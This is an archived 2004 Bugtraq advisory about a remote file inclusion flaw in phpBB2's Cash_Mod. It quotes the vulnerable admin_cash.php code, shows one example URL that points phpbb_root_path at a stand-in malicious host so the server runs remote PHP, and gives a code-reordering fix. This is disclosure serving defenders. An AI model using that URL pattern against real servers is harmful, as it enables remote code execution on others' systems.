lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20041118044742.16170.qmail@www.securityfocus.com> Date: 18 Nov 2004 04:47:42 -0000 From: Jerome ATHIAS <jerome@...ias.fr> To: bugtraq@...urityfocus.com Subject: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.) Hi all phpBB is a very popular message board using modules extensions. One of these module – Cash_Mod is a very popular one and is used by many people. It has critical vulnerabilities, one of them letting anyone inject malicious PHP code that will be executed on the server side. Let’s start : In file /admin/admin_cash.php ….. if ( !empty($setmodules) ) { include($phpbb_root_path . 'includes/functions_cash.'.$phpEx); $menu = array(); admin_menu($menu); …. First, nothing seems wrong! It’s just a normal piece of code with “include” functions, but $phpbb_root_path & .$phpEx – are *NOT* define yet! I don’t know why, but someone decided to define these variables later in the code : …… // // Let's set the root dir for phpBB // $phpbb_root_path = "./../"; require($phpbb_root_path . 'extension.inc'); require('./pagestart.' . $phpEx); include($phpbb_root_path . 'includes/functions_selects.'.$phpEx); ….. Well, any user can rewrite these parameters with GET or POST requests. Example : http://victim.host/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://bad.host/ Fix : Set all default parameters after “if ( !empty($setmodules) )” Example : // // Let's set the root dir for phpBB // $phpbb_root_path = "./../"; require($phpbb_root_path . 'extension.inc'); require('./pagestart.' . $phpEx); include($phpbb_root_path . 'includes/functions_selects.'.$phpEx); if ( !empty($setmodules) ) { include($phpbb_root_path . 'includes/functions_cash.'.$phpEx); $menu = array(); admin_menu($menu); Thank you rofl!
Powered by blists - more mailing lists